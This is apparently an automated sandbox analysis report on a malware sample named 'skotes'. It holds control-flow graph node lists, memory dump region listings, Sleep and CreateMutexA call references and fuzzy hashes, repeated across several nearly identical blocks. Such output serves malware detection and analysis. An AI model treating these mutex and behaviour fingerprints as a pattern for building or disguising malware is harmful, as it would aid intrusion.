                                                                                                                                                                                                        control_flow_graph 202 9ca682-9ca6a2 206 9ca6a4-9ca6b0 202->206 207 9ca6d0-9ca6ec 202->207 208 9ca6c6-9ca6cd call 9dd663 206->208 209 9ca6b2-9ca6c0 206->209 210 9ca6ee-9ca6fa 207->210 211 9ca71a-9ca739 207->211 208->207 209->208 214 9ca949-9ca994 call 9f6c6a * 2 Sleep CreateMutexA 209->214 216 9ca6fc-9ca70a 210->216 217 9ca710-9ca717 call 9dd663 210->217 212 9ca73b-9ca747 211->212 213 9ca767-9ca916 call 9d80c0 211->213 218 9ca75d-9ca764 call 9dd663 212->218 219 9ca749-9ca757 212->219 234 9ca996-9ca998 214->234 235 9ca9a7-9ca9a8 214->235 216->214 216->217 217->211 218->213 219->214 219->218 234->235 236 9ca99a-9ca9a5 234->236 236->235
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 9de58178db13f7afdee663300fb8bc6a240bd766021bad9b8c3a0bab7f84bc13
                                                                                                                                                                                                        • Instruction ID: 2759ecc0d609aa7bad4f5228c66322c0c64d6ce9fecf7100680b2ff10e6d844f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9de58178db13f7afdee663300fb8bc6a240bd766021bad9b8c3a0bab7f84bc13
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35310931F002099BEB18DB78DD89BADB766ABC1318F24861DE018972D1C77989808763

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 238 9c9adc-9c9ae8 239 9c9afe-9c9b27 call 9dd663 238->239 240 9c9aea-9c9af8 238->240 248 9c9b29-9c9b35 239->248 249 9c9b55-9c9b57 239->249 240->239 241 9ca917 240->241 243 9ca953-9ca994 Sleep CreateMutexA 241->243 244 9ca917 call 9f6c6a 241->244 252 9ca996-9ca998 243->252 253 9ca9a7-9ca9a8 243->253 244->243 254 9c9b4b-9c9b52 call 9dd663 248->254 255 9c9b37-9c9b45 248->255 250 9c9b59-9ca916 call 9d80c0 249->250 251 9c9b65-9c9d91 call 9d7a00 call 9c5c10 call 9c8b30 call 9d8220 call 9d7a00 call 9c5c10 call 9c8b30 call 9d8220 249->251 252->253 257 9ca99a-9ca9a5 252->257 254->249 255->241 255->254 257->253
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 749869be069792a4baad3fd24178dd0bf98a5fa2d5b61fa2f702347d58f54816
                                                                                                                                                                                                        • Instruction ID: d559eb3bd63ed41f8d6c2b150f93342099d0ae32fcea52c7fadeae5032475277
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 749869be069792a4baad3fd24178dd0bf98a5fa2d5b61fa2f702347d58f54816
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA213732B042059BEF1C9B6CECCDB6DB765EBD1314F20461DE418972E5C77999818B12

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 315 9ca856-9ca86e 316 9ca89c-9ca89e 315->316 317 9ca870-9ca87c 315->317 320 9ca8a9-9ca8b1 call 9c7d30 316->320 321 9ca8a0-9ca8a7 316->321 318 9ca87e-9ca88c 317->318 319 9ca892-9ca899 call 9dd663 317->319 318->319 322 9ca94e-9ca987 call 9f6c6a Sleep CreateMutexA 318->322 319->316 331 9ca8e4-9ca8e6 320->331 332 9ca8b3-9ca8bb call 9c7d30 320->332 324 9ca8eb-9ca916 call 9d80c0 321->324 335 9ca98e-9ca994 322->335 331->324 332->331 339 9ca8bd-9ca8c5 call 9c7d30 332->339 337 9ca996-9ca998 335->337 338 9ca9a7-9ca9a8 335->338 337->338 340 9ca99a-9ca9a5 337->340 339->331 344 9ca8c7-9ca8cf call 9c7d30 339->344 340->338 344->331 347 9ca8d1-9ca8d9 call 9c7d30 344->347 347->331 350 9ca8db-9ca8e2 347->350 350->324
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 3232f8774de9309b8e0b8da19ff940794494c55eb20b10bc20aa066515a2be8a
                                                                                                                                                                                                        • Instruction ID: 97b5233d459dc90f145e125dd83a1f1eb6262446a86fd6b6b19f45fa35b562f3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3232f8774de9309b8e0b8da19ff940794494c55eb20b10bc20aa066515a2be8a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B213031B452099BEB2857A8988AF7EB2659FC1704F244C1EE148D72D1CB7D49818663

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 292 9ca34f-9ca35b 293 9ca35d-9ca36b 292->293 294 9ca371-9ca39a call 9dd663 292->294 293->294 295 9ca93a 293->295 300 9ca39c-9ca3a8 294->300 301 9ca3c8-9ca916 call 9d80c0 294->301 298 9ca953-9ca994 Sleep CreateMutexA 295->298 299 9ca93a call 9f6c6a 295->299 306 9ca996-9ca998 298->306 307 9ca9a7-9ca9a8 298->307 299->298 303 9ca3be-9ca3c5 call 9dd663 300->303 304 9ca3aa-9ca3b8 300->304 303->301 304->295 304->303 306->307 310 9ca99a-9ca9a5 306->310 310->307
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
